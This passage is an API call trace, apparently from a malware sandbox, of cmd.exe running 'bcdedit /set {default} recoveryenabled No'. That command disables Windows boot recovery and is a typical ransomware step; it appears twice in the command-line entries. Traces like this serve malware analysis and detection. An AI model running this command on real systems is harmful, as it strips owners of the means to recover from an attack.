_Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0062.836] GetCurrentThreadId () returned 0x54c [0062.836] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x54c) returned 0x60 [0062.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.837] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0062.837] SetThreadUILanguage (LangId=0x0) returned 0x409 [0062.837] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0062.837] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fa84 | out: phkResult=0x22fa84*=0x0) returned 0x2 [0062.837] VirtualQuery (in: lpAddress=0x22fabb, lpBuffer=0x22fa54, dwLength=0x1c | out: lpBuffer=0x22fa54*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.837] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fa54, dwLength=0x1c | out: lpBuffer=0x22fa54*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0062.837] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fa54, dwLength=0x1c | out: lpBuffer=0x22fa54*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0062.837] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fa54, dwLength=0x1c | out: lpBuffer=0x22fa54*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.837] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fa54, dwLength=0x1c | out: lpBuffer=0x22fa54*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.837] GetConsoleOutputCP () returned 0x1b5 [0062.838] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0062.838] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0062.838] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.838] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0062.838] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.838] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0062.838] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.838] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0062.839] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.839] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0062.839] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.839] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0062.839] GetEnvironmentStringsW () returned 0x662030* [0062.839] GetProcessHeap () returned 0x650000 [0062.839] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xaca) returned 0x662b08 [0062.840] FreeEnvironmentStringsW (penv=0x662030) returned 1 [0062.840] GetProcessHeap () returned 0x650000 [0062.840] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x660c60 [0062.840] GetEnvironmentStringsW () returned 0x662030* [0062.840] GetProcessHeap () returned 0x650000 [0062.840] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xaca) returned 0x6635e0 [0062.840] FreeEnvironmentStringsW (penv=0x662030) returned 1 [0062.840] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e9f4 | out: phkResult=0x22e9f4*=0x68) returned 0x0 [0062.840] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x0, lpData=0x22ea00*=0x0, lpcbData=0x22e9f8*=0x1000) returned 0x2 [0062.840] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x4, lpData=0x22ea00*=0x1, lpcbData=0x22e9f8*=0x4) returned 0x0 [0062.840] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x0, lpData=0x22ea00*=0x1, lpcbData=0x22e9f8*=0x1000) returned 0x2 [0062.840] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x4, lpData=0x22ea00*=0x0, lpcbData=0x22e9f8*=0x4) returned 0x0 [0062.840] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x4, lpData=0x22ea00*=0x40, lpcbData=0x22e9f8*=0x4) returned 0x0 [0062.840] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x4, lpData=0x22ea00*=0x40, lpcbData=0x22e9f8*=0x4) returned 0x0 [0062.841] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x0, lpData=0x22ea00*=0x40, lpcbData=0x22e9f8*=0x1000) returned 0x2 [0062.841] RegCloseKey (hKey=0x68) returned 0x0 [0062.841] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e9f4 | out: phkResult=0x22e9f4*=0x68) returned 0x0 [0062.841] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x0, lpData=0x22ea00*=0x40, lpcbData=0x22e9f8*=0x1000) returned 0x2 [0062.841] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x4, lpData=0x22ea00*=0x1, lpcbData=0x22e9f8*=0x4) returned 0x0 [0062.841] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x0, lpData=0x22ea00*=0x1, lpcbData=0x22e9f8*=0x1000) returned 0x2 [0062.841] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x4, lpData=0x22ea00*=0x0, lpcbData=0x22e9f8*=0x4) returned 0x0 [0062.841] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x4, lpData=0x22ea00*=0x9, lpcbData=0x22e9f8*=0x4) returned 0x0 [0062.841] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x4, lpData=0x22ea00*=0x9, lpcbData=0x22e9f8*=0x4) returned 0x0 [0062.841] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e9fc, lpData=0x22ea00, lpcbData=0x22e9f8*=0x1000 | out: lpType=0x22e9fc*=0x0, lpData=0x22ea00*=0x9, lpcbData=0x22e9f8*=0x1000) returned 0x2 [0062.841] RegCloseKey (hKey=0x68) returned 0x0 [0062.841] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb031ff [0062.841] srand (_Seed=0x5eb031ff) [0062.841] GetCommandLineW () returned="cmd.exe /c bcdedit /set {default} recoveryenabled No" [0062.841] GetCommandLineW () returned="cmd.exe /c bcdedit /set {default} recoveryenabled No" [0062.842] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.842] GetProcessHeap () returned 0x650000 [0062.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x210) returned 0x662030 [0062.842] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x662038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0062.842] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0062.842] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0062.842] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.842] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0062.842] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0062.842] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0062.842] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0062.842] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0062.842] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0062.843] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0062.843] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0062.843] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0062.843] GetProcessHeap () returned 0x650000 [0062.843] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x662b08 | out: hHeap=0x650000) returned 1 [0062.843] GetEnvironmentStringsW () returned 0x662248* [0062.843] GetProcessHeap () returned 0x650000 [0062.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xae2) returned 0x664ba8 [0062.843] FreeEnvironmentStringsW (penv=0x662248) returned 1 [0062.843] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.843] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.843] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0062.843] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0062.843] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0062.843] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0062.843] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0062.843] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0062.844] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0062.844] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0062.844] GetProcessHeap () returned 0x650000 [0062.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x665698 [0062.844] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f7c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.844] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x22f7c0, lpFilePart=0x22f7bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f7bc*="Desktop") returned 0x25 [0062.844] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.844] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f53c | out: lpFindFileData=0x22f53c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x661eb0 [0062.844] FindClose (in: hFindFile=0x661eb0 | out: hFindFile=0x661eb0) returned 1 [0062.844] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x22f53c | out: lpFindFileData=0x22f53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x661eb0 [0062.845] FindClose (in: hFindFile=0x661eb0 | out: hFindFile=0x661eb0) returned 1 [0062.845] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0062.845] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x22f53c | out: lpFindFileData=0x22f53c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd010580, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0xd010580, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x661eb0 [0062.845] FindClose (in: hFindFile=0x661eb0 | out: hFindFile=0x661eb0) returned 1 [0062.845] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.845] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0062.845] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0062.845] GetProcessHeap () returned 0x650000 [0062.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664ba8 | out: hHeap=0x650000) returned 1 [0062.845] GetEnvironmentStringsW () returned 0x6640b8* [0062.845] GetProcessHeap () returned 0x650000 [0062.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb36) returned 0x665ef8 [0062.845] FreeEnvironmentStringsW (penv=0x6640b8) returned 1 [0062.846] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.846] GetProcessHeap () returned 0x650000 [0062.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x665698 | out: hHeap=0x650000) returned 1 [0062.846] GetProcessHeap () returned 0x650000 [0062.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400e) returned 0x666a38 [0062.846] GetProcessHeap () returned 0x650000 [0062.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x60) returned 0x662d88 [0062.846] GetProcessHeap () returned 0x650000 [0062.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x666a38 | out: hHeap=0x650000) returned 1 [0062.846] GetConsoleOutputCP () returned 0x1b5 [0062.846] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0062.846] GetUserDefaultLCID () returned 0x409 [0062.847] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0062.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f900, cchData=128 | out: lpLCData="0") returned 2 [0062.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f900, cchData=128 | out: lpLCData="0") returned 2 [0062.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f900, cchData=128 | out: lpLCData="1") returned 2 [0062.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0062.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0062.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0062.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0062.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0062.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0062.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0062.849] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0062.849] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0062.849] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0062.849] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0062.851] GetProcessHeap () returned 0x650000 [0062.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20c) returned 0x662df0 [0062.851] GetConsoleTitleW (in: lpConsoleTitle=0x662df0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.851] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.851] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0062.851] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0062.852] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0062.852] GetProcessHeap () returned 0x650000 [0062.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400a) returned 0x666a38 [0062.852] GetProcessHeap () returned 0x650000 [0062.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x666a38 | out: hHeap=0x650000) returned 1 [0062.853] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0062.853] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0062.853] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0062.853] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0062.853] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0062.853] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0062.853] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0062.853] GetProcessHeap () returned 0x650000 [0062.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x58) returned 0x663008 [0062.853] GetProcessHeap () returned 0x650000 [0062.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x18) returned 0x663068 [0062.855] GetProcessHeap () returned 0x650000 [0062.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4e) returned 0x663088 [0062.856] GetConsoleTitleW (in: lpConsoleTitle=0x22f5f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.856] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0062.856] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0062.856] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0062.856] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0062.857] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0062.857] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0062.857] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0062.857] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0062.857] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0062.857] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0062.857] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0062.857] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0062.857] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0062.857] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0062.857] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0062.857] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0062.857] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0062.857] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0062.857] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0062.857] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0062.857] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0062.857] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0062.857] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0062.857] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0062.857] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0062.857] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0062.857] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0062.857] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0062.857] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0062.857] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0062.857] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0062.857] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0062.857] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0062.857] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0062.858] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0062.858] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0062.858] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0062.858] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0062.858] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0062.858] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0062.858] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0062.858] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0062.858] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0062.858] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0062.858] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0062.858] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0062.858] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0062.858] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0062.858] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0062.858] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0062.858] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0062.858] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0062.858] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0062.858] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0062.858] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0062.858] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0062.858] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0062.858] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0062.859] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0062.859] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0062.859] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0062.859] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0062.859] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0062.859] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0062.859] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0062.859] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0062.859] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0062.859] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0062.859] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0062.859] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0062.859] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0062.859] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0062.859] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0062.859] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0062.859] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0062.859] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0062.859] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0062.859] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0062.859] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0062.859] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0062.859] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0062.859] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0062.859] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0062.859] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0062.859] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0062.860] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0062.860] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0062.860] GetProcessHeap () returned 0x650000 [0062.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x210) returned 0x6630e0 [0062.860] GetProcessHeap () returned 0x650000 [0062.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x5e) returned 0x6632f8 [0062.860] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0062.861] GetProcessHeap () returned 0x650000 [0062.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x418) returned 0x6507f0 [0062.861] SetErrorMode (uMode=0x0) returned 0x0 [0062.861] SetErrorMode (uMode=0x1) returned 0x0 [0062.861] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6507f8, lpFilePart=0x22f118 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f118*="Desktop") returned 0x25 